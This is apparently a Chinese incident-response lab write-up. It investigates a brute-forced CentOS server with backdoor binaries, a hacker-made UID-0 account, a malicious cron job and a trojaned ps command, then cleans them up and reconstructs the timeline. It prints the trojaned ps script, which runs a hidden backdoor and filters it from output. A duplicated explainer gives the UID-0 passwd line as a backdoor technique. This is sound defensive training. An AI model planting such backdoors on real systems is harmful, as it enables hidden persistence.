任务14 应急响应案例4

发布时间:2026/8/6 12:14:40
任务14 应急响应案例4 下载链接 https://pan.baidu.com/s/1Upr1e4ZagIY0CGzbZ73bbg?pwdsqjd1.事件背景某日一位客户发来反馈服务器似乎遭到入侵正在与一个恶意 IP代号192.168.226.131进行通信。受影响的服务器运行着 CentOS 操作系统IP地址为 192.168.226.132但未部署任何 WEB 服务。用户名密码root root2. 应急响应过程2.1 排查网络连接在检查服务器的网络连接时我发现了一个异常现象服务器 192.168.226.132 不断地与恶意 IP 地址 192.168.226.131 的 3512 端口建立连接并且这些连接的程序名被标识为 shell.elf其 PID 号分别是 3424和 12874。这一情况让我意识到可能存在严重的安全问题需要立即采取行动来应对这一威胁.netstat -anpt在观察异常通信时我注意到这些连接状态为 SYN_SENT而且隔一段时间就会重新发起连接而且每次连接的进程 PID 号都不相同。这种现象表明恶意 IP 地址192.168.226.131的行为异常可能在尝试进行入侵或者进行其他恶意活动我根据 PID 号查找到了对应程序的位置发现它位于 /root/shell.elf。这个发现让我更加警觉因为该程序不仅与异常的恶意 IP 地址建立了连接而且其位置在根目录下这可能意味着它具有潜在的危险性。需要立即对此程序进行深入分析和处理以确保服务器的安全。lsof -p 3430lsof -p 3512通过查看我发现 shell.elf 文件的创建时间是在 2022 年 1 月 14 日的 00:51:12。这个发现让我更加担忧因为这意味着这个恶意程序已经存在了一段时间可能已经在服务器上潜伏了一段时间。现在更加迫切需要采取行动阻止其进一步的恶意活动并确保服务器的安全。stat shell.elf进一步的分析表明经过将 shell.elf 文件提交到微步在线检测平台检测后结果显示该文件确实是一个后门文件。这个发现再次强调了安全威胁的严重性因为后门文件可能允许攻击者远程控制服务器执行恶意操作或窃取敏感信息。2.2 历史命令排查我立即检查服务器的日志以查看是否有任何可疑的命令被黑客执行。通过分析日志记录我能够追踪到任何可能的恶意活动或非授权访问并且采取适当的措施来应对这些威胁。History发现历史命令已经都被黑客清空2.3 排查后门账户要查看当前登录系统的用户可以使用 who 命令或 w 命令。这些命令将显示当前登录到系统的用户及其相关信息。执行这些命令后系统将显示当前登录到系统的用户列表包括用户名、登录时间、登录来源等信息。没有发现异常。查看特权账户awk -F: $30 {print$1} /etc/passwd# /etc/passwd 条目完整解析 样例 root:x:0:0:root:/root:/bin/bash 整条以**冒号 :** 分隔一共7个字段格式统一 用户名:密码占位符:UID:GID:注释信息:家目录:登录Shell ## 字段逐一拆解 ### 1. 第1段root 登录用户名系统登录标识。 ### 2. 第2段x 密码占位符 - x用户加密密码**不在passwd**存放于 /etc/shadow现代Linux默认shadow严格权限仅root可读 - 为空无密码可直接免密登录 - 特殊字符早期系统直接存放加密密码现已废弃不安全。 ### 3. 第3段0UID 用户ID - UID0**超级管理员root**系统唯一最高权限 - 1~999系统内置服务账号nginx、mysql等禁止登录 - ≥1000普通新建用户。 ### 4. 第4段0GID 组ID 对应 /etc/group 内的用户初始用户组IDroot默认归属root组。 ### 5. 第5段root注释/备注 个人说明、全名可自定义一般写用户名、描述空着也合法。 ### 6. 第6段/root家目录 用户登录后默认所在文件夹 - root专属家目录 /root - 普通用户一般为 /home/用户名。 ### 7. 第7段/bin/bash登录Shell 用户登录后使用的命令解释器 1. /bin/bash可正常交互式登录 2. /sbin/nologin禁止SSH/终端登录多用于服务账号 3. /bin/false强制拒绝登录 4. /sbin/shutdown登录即关机特殊用途。 ## 延伸知识点安全渗透常用 1. **提权后门手法** 手动新增一行 test:x:0:0::/root:/bin/bashUID0 实现伪root账号拥有最高权限。 2. **账号排查** 排查异常UID0的陌生账号排查nologin以外的可疑服务账号是入侵排查常用手段。 3. 配套文件 - /etc/passwd所有用户基础信息所有用户可读 - /etc/shadow密码哈希、过期策略仅root可读 - /etc/group用户组信息。 ## 同类示例对比 nginx:x:997:997::/home/nginx:/sbin/nologin 普通服务账号UID997不可登录仅运行服务。/etc/passwd 条目完整解析样例root:x:0:0:root:/root:/bin/bash整条以冒号:分隔一共7个字段格式统一用户名:密码占位符:UID:GID:注释信息:家目录:登录Shell字段逐一拆解第1段root登录用户名系统登录标识。第2段x密码占位符x用户加密密码不在passwd存放于/etc/shadow现代Linux默认shadow严格权限仅root可读为空无密码可直接免密登录特殊字符早期系统直接存放加密密码现已废弃不安全。第3段0UID 用户IDUID0超级管理员root系统唯一最高权限1~999系统内置服务账号nginx、mysql等禁止登录≥1000普通新建用户。第4段0GID 组ID对应/etc/group内的用户初始用户组IDroot默认归属root组。第5段root注释/备注个人说明、全名可自定义一般写用户名、描述空着也合法。第6段/root家目录用户登录后默认所在文件夹root专属家目录/root普通用户一般为/home/用户名。第7段/bin/bash登录Shell用户登录后使用的命令解释器/bin/bash可正常交互式登录/sbin/nologin禁止SSH/终端登录多用于服务账号/bin/false强制拒绝登录/sbin/shutdown登录即关机特殊用途。延伸知识点安全渗透常用提权后门手法手动新增一行test:x:0:0::/root:/bin/bashUID0 实现伪root账号拥有最高权限。账号排查排查异常UID0的陌生账号排查nologin以外的可疑服务账号是入侵排查常用手段。配套文件/etc/passwd所有用户基础信息所有用户可读/etc/shadow密码哈希、过期策略仅root可读/etc/group用户组信息。同类示例对比nginx:x:997:997::/home/nginx:/sbin/nologin普通服务账号UID997不可登录仅运行服务。经过与客户沟通后确认发现了两个特权账户root 和 wxiaoge。进一步的调查表明wxiaoge 账户是由黑客创建的这个发现非常重要因为它可能是入侵事件的一部分。查看可以远程登录的帐号信息awk /\$1|\$6/{print $1} /etc/shadowawk /\$1|\$6/{print $1} /etc/shadow又有wxiaoge确定了 wxiaoge 是黑客的后门账户接下来查看用户最近登录情况cat secure |grep Accepted grep Accepted /var/log/secure* | awk {print $1,$2,$3,$9,$11}发现 wxiaoge 账户在 1 月 14 日的 00:47:33 登录了服务器而该登录来源的 IP 地址为 192.168.226.1。2.4 排查crontab后门查看服务器的定时任务crontab -l经过调查发现root账户下存在一个定时任务它每分钟都在执行 /root/shell.elf 文件。且 shell.elf 文件已被确认为后门文件。2.5 排查是否有命令被替换继续进一步检查确认命令文件是否被替换。这项检查是为了确保被执行的命令文件没有被恶意文件所替代从而防止可能的安全威胁。rpm -Vf /usr/bin/* #S 关键字代表文件大小发生了变化 #5 关键字代表文件的 md5 值发生了变化 #T 代表文件时间发生了变化rpm -Vf /usr/bin/*#S 关键字代表文件大小发生了变化#5 关键字代表文件的 md5 值发生了变化#T 代表文件时间发生了变化查看ps命令内容cat /usr/bin/ps发现ps文件内容发现被修改了且被被修改成以下内容[root192 log]# cat /usr/bin/ps #!/bin/bash /centos_core.elf /.hide_command/ps |grep -v shell | grep -v centos_core | grep bash#!/bin/bash/centos_core.elf /.hide_command/ps |grep -v shell | grep -v centos_core | grep bash#每次执行ps命令都会执行centos_core.elf文件、.hide_command/ps文件#grep -v的意思是只打印没有匹配的而匹配的反而不打印相当于隐藏shell、centos_core、bash异常文件信息查看centos_core.elf文件创建时间为2022-01-14 00:57:03.954050367 -0500stat /centos_core.elf将 centos_core.elf 文件放在微步云沙箱检测是后门文件经过调查发现存在一个名为 ps 的命令后门。这个后门通过替换正常的 ps 命令来实现每当执行一次 ps 命令时实际上会触发执行 /centos_core.elf 后门文件。这种情况非常危险因为它允许攻击者在不被察觉的情况下执行恶意操作。2.6 总结经过调查我们确认了以下安全问题1. 发现后门文件 /root/shell.elf 和 /centos_core.elf 存在于系统中这些文件可能被黑客用于执行恶意操作。2. 账户 wxiaoge 被发现是一个后门账户可能被黑客用于入侵和执行恶意活动。3. 发现存在恶意定时任务可能被用于定期执行恶意代码或命令。4. 发现 ps 命令被替换为后门版本每次执行 ps 命令都会触发执行后门代码。这些发现表明系统存在严重的安全威胁我们必须立即采取措施来清除后门文件、禁用后门账户、删除恶意定时任务并修复被替换的 ps 命令以确保服务器的安全。清除后门文件rm -rf /root/shell.elfrm -rf /centos_core.elf将ps命令删除再将 .hide_command/ps 恢复rm -rf /usr/bin/psmv /.hide_command/ps /usr/bin/ps删除后门账户vi /etc/passwd#vi编辑额passwd文件按dd删除 wxiaoge那一行之后保存并推出3.应急响应溯源3.1 查看后门查看 shell.elf 文件的创建时间为2022-01-14 00:51:12stat shell.elf查看 定时任务 root 文件的创建时间为2022-01-14 01:05:53stat /var/spool/cron/root查看centos_core.elf文件创建时间为2022-01-14 00:57:03.954050367 -0500stat /centos_core.elf查看 ps命令文件修改时间为2022-01-14 01:03:42stat /usr/bin/ps3.2 排查安全日志查看secure日志发现爆破的时间范围是1.13 215132——215831cat /var/log/secure |grep Failedcat secure |grep Failed|head -n 5 cat secure |grep Failed|tail -n 5 cat /var/log/secure |grep Failed查看爆破的次数、攻击IP、破的用户名#查询有哪些IP在爆破命令grep Failed password /var/log/secure|grep -E -o (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|uniq -cgrep Failed password /var/log/secure|grep -E -o (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)|uniq -c#查询被爆破的用户名都有哪些grep Failed password /var/log/secure|perl -e while($_){ /for(.*?) from/; print $1\n;}|uniq -c|sort -nrgrep Failed password /var/log/secure|perl -e while($_){ /for(.*?) from/; print $1\n;}|uniq -c|sort -nr接下来查看用户最近登录情况grep Accepted /var/log/secure* | awk {print $1,$2,$3,$9,$11}grep Accepted /var/log/secure* | awk {print $1,$2,$3,$9,$11}发现 root 账户在1月13 日 21:57:56 登录了该服务器在爆破的时间范围内21:51:32——21:58:31wxiaoge 账户在 1月14 日 00:47:33登录了该服务器3.3溯源总结经过调查发现黑客于 1 月 13 日的 21:51:32 到 21:58:31 期间对服务器进行了爆破行为并在 21:57:56 成功爆破出了 root 账户的密码并且成功登录到系统。在 1 月 14 日的 00:51:12黑客植入了名为 shell.elf 的后门随后在 00:57:03 植入了名为 centos_core.elf 的后门并在 01:03:42 植入了针对 ps 命令的后门。另外在 01:05:53 时黑客还写入了恶意定时任务。这些恶意行为都是由 IP 地址为 192.168.226.1 的黑客发起的。